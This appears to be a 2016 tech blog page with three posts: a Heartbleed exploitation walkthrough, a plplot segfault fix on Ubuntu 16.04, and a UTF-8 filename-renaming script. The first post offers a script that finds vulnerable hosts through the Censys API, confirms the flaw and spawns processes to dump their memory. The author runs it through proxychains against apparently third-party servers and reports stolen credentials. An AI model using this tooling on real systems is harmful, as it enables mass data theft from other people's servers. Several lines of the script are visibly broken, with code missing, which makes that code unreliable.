August 2016

Leverage Censys database in your search for well-known vulnerabilities

The Censys Database

Censys is a well-known search engine that allows researchers all around the world to ask questions about the hosts and networks that compose the Internet. It is a massive database built from daily zmap and zgrab scans of the entire IPv4 address space. It can be used free of charge and it has its own API, with bindings for the most popular programming languages, such as Python. So if you need to scan your own huge company network, maybe you should consider querying the Censys database instead of running your own zmap scan. If you prefer to query the database offline, you can download part of it to your hard disk and parse it using your own routines; there is no need to use the API if you don’t feel like it.

This post will show you how to leverage the Censys database to look for potential HeartBleed-vulnerable servers among the public servers or devices you may have on the Internet.

Using the search engine

To look for potential HeartBleed-vulnerable servers in a particular IPv4 class B (/16) range, use this expression in the search engine:

W.X.Y.Z/16 and tags: heartbleed

Hopefully you will not get any results. But if you do, make sure none of the reported hosts or devices actually have the bug; otherwise you are entirely exposed to anyone who wants to steal data from them. The screenshot below shows that some hosts have been found to be potentially vulnerable servers. At least they were at the time of scanning:

Looking for potential HeartBleed vulnerable servers in Censys Database.

If you don’t set a proper CIDR filter, you will get every host that was reported as vulnerable at the time of scanning. There are plenty of them: as of writing, a total of 229,956 hosts!

As of writing, there is still an awful lot of potential HeartBleed vulnerable servers on the Internet.

Of course, you can look for any particular service and a large number of different tags, so you can find almost any potentially vulnerable server thanks to the Censys database without performing the scan yourself. All entries have a timestamp that lets you know when the scan was performed; chances are that some hosts are not vulnerable or accessible anymore.

Trying the host

Once you have a list of servers potentially vulnerable to the HeartBleed security issue, you can test them to make sure they are still vulnerable. To do so, choose whatever exploit you prefer (write your own, use the Metasploit Framework, or download the quick-and-dirty Python PoC written by Jared Stafford and modified by Csaba Fitzl). Here we will be using the latter. Download the PoC (written in Python) from here:

You can send a single TLS heartbeat request to the server and check whether the response contains 64KB of data:
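The check itself comes down to reading the 5-byte TLS record header of the heartbeat response: a record of type 24 whose declared length far exceeds what a legitimate reply should carry means the server echoed back extra memory. A minimal sketch of that idea (the function names are mine, not taken from the PoC):

```python
import struct

def parse_tls_record_header(data):
    """Split the 5-byte TLS record header into (content type, version, length)."""
    content_type, version, length = struct.unpack(">BHH", data[:5])
    return content_type, version, length

def looks_vulnerable(header, requested=0x4000):
    """Type 24 is a heartbeat record; a 16KB response to a tiny
    request means the server leaked memory (the HeartBleed bug)."""
    ctype, _, length = parse_tls_record_header(header)
    return ctype == 24 and length >= requested
```

In the session below, the record `type = 24, ver = 0300, length = 16384` is exactly what such a check flags.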

~$ proxychains python ip_vulnerable_host

Trying SSL 3.0...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0300, length = 86
 ... received message: type = 22, ver = 0300, length = 2144
 ... received message: type = 22, ver = 0300, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0300, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 00 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................

WARNING: server returned more data than it should - server is vulnerable!

Indeed, this host is still vulnerable.


Thanks to the Censys API, you can write a program that looks for potentially vulnerable servers in the database and then tests them to determine whether they are still vulnerable. You can feed the results either into an existing framework (such as Metasploit) or into your own. The flexibility knows no bounds. For this particular case, I wrote a simple Python script that leverages the Censys API to get a list of servers potentially vulnerable to the HeartBleed bug and then launches the previous PoC to check whether each host is still vulnerable and needs to be patched:

import sys
import os
import signal
import getopt
import censys.ipv4
import urllib2
import subprocess
from subprocess import Popen
usage = """ HeartBleed data puller, by Toni Castillo Girona
  -q QUERY, the query to perform (it will be prepended to "and tags: heartbleed").
  -d, only QUERY the database and do nothing more (no connections to hosts).
  -c, only check for the vulnerability without capturing more than 64KB.
  -t DELAY, set the timeout in seconds between data pulls.
  -l LIMIT, maximum number of hosts to be returned.
  -h|-?, get a list of valid arguments.

  Query the database in order to find potential HeartBleed-vulnerable servers
  in SPAIN:
   ./ -q "location.country_code: ES and tags: heartbleed"
  Locate any potentially vulnerable server in a given range and test
  the vulnerability:
   proxychains ./ -q "X.Y.0.0/16 and tags: heartbleed" -c 2>/dev/null
  Perform the same command as before, but this time limit the results to two hosts and
  spawn a new data-puller process for every vulnerable server in order to retrieve
  data from them:
   proxychains ./ -q "X.Y.0.0/16 and tags: heartbleed" -l 2 2>/dev/null
  Do the same as before, but adding an interval of 120 seconds between data pulls:
   proxychains ./ -q "X.Y.0.0/16 and tags: heartbleed" -l 2 -t 120 2>/dev/null
  Get the first 20 potentially vulnerable hosts over the IPv4 spectrum:
   ./ -d -l 20
"""
# The API keys; you must get a valid account from Censys and fill these
# variables accordingly:
UID = ""
SECRET = ""
# Path and name for the Python exploit PoC:
exploit = ""
# Path and name for the Bash script to pull data:
pull = ""
# Default timeout in seconds between data-pulls, 1 minute:
timeout = 60
# By default, the script will not connect to the hosts:
try_host = 0
# By default, return all the hosts:
maxhosts = 0
# Default query:
query = "tags: heartbleed"
# Dry-run; only query the database and do nothing:
dry_run = 0
# The UID and SECRET vars must be present or the script will
# not be able to use the CENSYS API to retrieve the information:
if UID == "" or SECRET == "":
	print "Please, set the UID and SECRET variables according to your CENSYS account."
	print "Please visit for additional information."
	sys.exit(1)
# Get the script arguments:
try:
	opts, args = getopt.getopt(sys.argv[1:], "dq:l:t:ch?")
except getopt.GetoptError as err:
	print " [*] ERROR: %s" % str(err)
	print usage
	sys.exit(1)
# Process the arguments
for option, value in opts:
	# Only query the database, don't try to check the vulnerability.
	# This ignores -t and -c
	if option == "-d":
		dry_run = 1
	# Set the query:
	if option == "-q":
		query = value
	# Set the timeout:
	if option == "-t":
		try:
			timeout = int(value)
		except ValueError:
			print value, "is not a valid numeric value."
			sys.exit(1)
	# Connect to the hosts?:
	if option == "-c":
		try_host = 1
	# Set the total number of hosts to be returned:
	if option == "-l":
		try:
			maxhosts = int(value)
		except ValueError:
			print value, "is not a valid numeric value."
			sys.exit(1)
	# Help:
	if option in ("-h", "-?"):
		print usage
		sys.exit(0)
ipv4s = censys.ipv4.CensysIPv4(UID, SECRET)
# The fields we want in the resultset. Apart from the web, the field "tags"
# will hold any additional opened port for any host in the database:
fields = ["ip", "protocols"]
# Command pool for "data-pulling":
pulling = []
host = 1
vuln = 0
# Query and iterate through the Censys database:
for ip in, fields=fields):
	# We have reached the last host to be returned:
	if maxhosts > 0 and host > maxhosts:
		break
	ports = ""
	# Let's parse the protocols field:
	for port in ip["protocols"]:
		ports += port + " "
	#Let's get when this entry has been updated in the database:
	updated = ipv4s.view(ip["ip"])
	# Print this host ip and ports:
	print ip["ip"] , "Ports: [" , ports , "]" , "Updated at: " , updated["updated_at"],
	# In case we have set the "-c" flag, it will try to capture the first 64KB-chunk
	# of data. Otherwise, it will spawn a new thread in order to start the data
	# pulling procedure.
	# Of course, the first 64KB-chunk pulling happens always!
	if dry_run == 0:
		# Prepare the command to be executed:
		cmd = "./" + exploit + " " + ip["ip"] + " >/dev/null"
		cmd_pull = "./" + pull + " " + ip["ip"] + " " + str(timeout) + "s >/dev/null"
		# Test the vulnerability by sending ONE packet:
		res =, shell=True)
		if res == 0:
			vuln = 1
			print "VULNERABLE"
		else:
			vuln = 0
			print
		# If we want to test the vulnerability and nothing else,
		# get the next potential vulnerable host; otherwise
		# queue a new command so we can start capturing data later:
		if try_host == 0 and vuln == 1:
			# Add this new command to the pool:
			pulling.append(cmd_pull)
	host += 1
# After gathering all the vulnerable hosts, start collecting data in parallel.
# If the flag "-d" has been set, len(pulling)=0, therefore nothing will be done:
if try_host == 0 and len(pulling)>0:
    print "Spawning", len(pulling), "processes for pulling data ..."
    ps = [Popen(c, shell=True, preexec_fn=os.setsid) for c in pulling]
    # The processes will be executed in parallel.
    # We allowed here to kill all the spawning processes at will:
    while 1:
        print "Kill the processes [yY]?: ",
        key = raw_input()
        if key in ("Y","y"):
            for p in ps:
                print "Killing process",
                os.killpg(os.getpgid(, signal.SIGKILL)
            # Exit the script:

This script allows me to start a new parallel process for each proven vulnerable host, pulling data from its memory and storing it in its own log file for further analysis. As you can see, it is a piece of cake to write a quick-and-dirty script that takes advantage of the Censys database to look for potentially vulnerable servers and use that information to either test or exploit them automatically. Unluckily for us, the bad guys are doing precisely that.

Running my script

Setting a filter to make sure my script only searches for potential HeartBleed-vulnerable servers in a certain IPv4 range, I found a bunch of them. With the -l flag, my script limits the results to the first two vulnerable hosts, then tests them and spawns two processes to start pulling data from their memory. After a while, I stop the processes and the data-pulling ends:

proxychains ./ -q "X.Y.0.0/16 and tags: heartbleed" -l 2 2>/dev/null
ProxyChains-3.1 (
X.Y.Z.187 Ports: [ 443/https ] Updated at: 2016-06-24T09:11:39+00:00 VULNERABLE
X.Y.Z.123 Ports: [ 443/https ] Updated at: 2016-04-20T20:18:29+00:00 VULNERABLE
Spawning 2 processes for pulling data ...
Kill the processes [yY]?: y
Killing process 18680
Killing process 18681

Having a look at the log files, I found some credentials, as shown in the next screenshot:

Stolen credentials from a vulnerable server's memory.



The Censys database is a massive resource when looking for potentially vulnerable servers. It can be used in many ways; this post has given just one example of how to leverage it and its API.


plplot 5.9.9 libraries on Ubuntu Xenial 16.04 segfault

The issue

According to some professors working in my department, newer versions of the plplot library ship with an entirely new API, rendering all their legacy scientific code unusable. So instead of re-writing all the code that makes use of the plplot routines, they asked me to install a version prior to all these changes. plplot 5.9.9, which ships out of the box with Debian Wheezy, is as good as any.

After compiling the original Debian package on some modern GNU/Linux distros and checking that everything ran fine, I did the same on an Ubuntu 16.04 (Xenial) box. This time, however, I was not so lucky; a scientific program that made use of plplot 5.9.9 crashed:

./plp_preccyl < plp_input
-164.213572416971 173.427378522441
Aborted (core dumped)

Compiling the binary with Debugging Symbols

I added the debugging symbols to the plp_preccyl binary in order to trace the fault, and then I re-ran the code inside a gdb session:

(gdb) run < plp_input
Starting program: /src/test/plp_preccyl < plp_input
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".
[New Thread 0x2aaac0a5f700 (LWP 3510)]
[New Thread 0x2aaac0c60700 (LWP 3511)]
[New Thread 0x2aaac0e61700 (LWP 3512)]
[New Thread 0x2aaac19ec700 (LWP 3513)]
[New Thread 0x2aaac1bed700 (LWP 3514)]
-164.213572416971 173.427378522441
[Thread 0x2aaac1bed700 (LWP 3514) exited]

Thread 1 "plp_preccyl" received signal SIGSEGV, Segmentation fault.
0x00002aaabbb2512d in gtk_container_add () from /usr/lib/x86_64-linux-gnu/

Once the segfault was triggered, I used the bt command to see the program’s back-trace:

(gdb) bt
#0 0x00002aaabbb2512d in gtk_container_add ()
at /plplot-5.9.9/drivers/qt.cpp:104
#11 0x00002aaab2342dfd in plD_init_rasterqt (pls=0x2aaaaaf2ddc0 <pls0>)
at /plplot-5.9.9/drivers/qt.cpp:278
#12 0x00002aaaaacea5b9 in plP_init () at /plplot-5.9.9/src/plcore.c:140
#13 0x00002aaaaacef004 in c_plinit () at /plplot-5.9.9/src/plcore.c:2248
#14 0x000000000040c4c2 in start_plot (device=…, kdev=168004192,
filename=<error reading variable: Cannot access memory at address 0x18>,
icolmap=<error reading variable: Cannot access memory at address 0x0>,
.tmp.DEVICE.len_V$d40=166761088, .tmp.FILENAME.len_V$d43=35) at plp_preccyl.f:2173
#15 0x0000000000414b3c in make_plot_z (pzvz=…, nrp=168004192,
ntp=<error reading variable: Cannot access memory at address 0x18>,

According to the back-trace, the segmentation fault was triggered during the plotting routine using the qt driver. So I decided to try a quick-and-dirty fix: re-compile plplot without support for the qt driver.

Disabling the qt driver

To disable support for the qt driver in the plplot library, I set the directive DEFAULT_NO_QT_DEVICES to ON in cmake/modules/drivers-init.cmake:

“Disable all qt devices by default (ON) or enable qt devices individually by default (OFF)”

Then I cleaned plplot5.9.9 build directory and re-built it from scratch:

debian/rules clean

debian/rules binary

Once the building process was finished, I re-installed it under the directory /usr/local/plplo599:

cd debian/build_tmp && make install

Finally, I re-compiled the plp_preccyl program and re-ran it. This time, the program finished its execution with no issues at all, plotting all the figures in the different graphic formats (png, eps, pdf).

The binaries

If you need this particular version of plplot and you are running Ubuntu 16.04 64-bit (Xenial), you can get the binaries from here. Decompress them under /usr/local and make sure to change your Makefiles accordingly to use the new include and lib directories. Before running your program, don’t forget to set the LD_LIBRARY_PATH environment variable to match the plplot 5.9.9 lib directory!

utf-8-py: a script that fixes ownCloud non-UTF8 filenames issues

The script

Some months ago I had to face an annoying issue that affected the ownCloud client during the folder-synchronization process. As a result, I wrote a trivial Python script that helped me rename the non-UTF-8 filenames using the UTF-8 encoding. Today I had to deal with the very same issue, so I decided to add some functionality to the original script.


This script has been written in Python 2.7. This is what you will need in order to execute the script:

  • Python 2.7.
  • The convmv utility (# apt-get install convmv).
  • The Python chardet module (# apt-get install python-chardet).
  • The script itself,

Using the script

./ -d PATH [-t THRESHOLD] [-l LOG] [-r]

-d PATH:

The directory to analyse and, if the -r flag is given, to fix (i.e., all the files and directories inside the PATH directory will be renamed according to the UTF-8 encoding standard).


-t THRESHOLD

The chardet module exposes a value called “confidence” for each detected charset. With the -t flag, one can set the minimum confidence a detected charset must reach before the script attempts to rename the file or directory using UTF-8. It is a numerical value in the range [0..1]. Default value: 0.8.
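In essence, the confidence value gates the renaming step. A stdlib-only sketch of that logic (chardet would supply detected_charset and confidence; the function names are mine, not from the script):

```python
def needs_utf8_fix(name_bytes):
    """True when a filename's raw bytes are not valid UTF-8."""
    try:
        name_bytes.decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True

def to_utf8(name_bytes, detected_charset, confidence, threshold=0.8):
    """Re-encode a filename to UTF-8, but only when the detector's
    confidence reaches the -t threshold; otherwise leave it alone."""
    if confidence < threshold:
        return None
    return name_bytes.decode(detected_charset).encode("utf-8")
```

For instance, the Latin-1 bytes of "café" fail the UTF-8 check and get transcoded, while a low-confidence detection leaves the name untouched.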

-l LOG

By default, the script will create a logfile called utf8-log.txt in the same directory where it is executed. With this flag, one can choose the logfile’s location and name.


-r

By default, the execution of the script is a dry run; i.e., the files and directories inside PATH will not be renamed. By passing this flag, the files and directories inside PATH will actually be renamed.


This command will generate a log file under /tmp/analysis.log for the directory /home/data, detecting any non-UTF8 charset with a default confidence of 0.8. No file or directory renaming will take place, so the directory /home/data will remain unchanged:

./ -d /home/data -l /tmp/analysis.log

This command will rename any file or directory under /home/data whose detected charset reaches a confidence of at least 0.95; the rest will not be renamed:

./ -d /home/data -l /tmp/renamed.log -t 0.95 -r

Download the script

You can get the latest version of this script right here.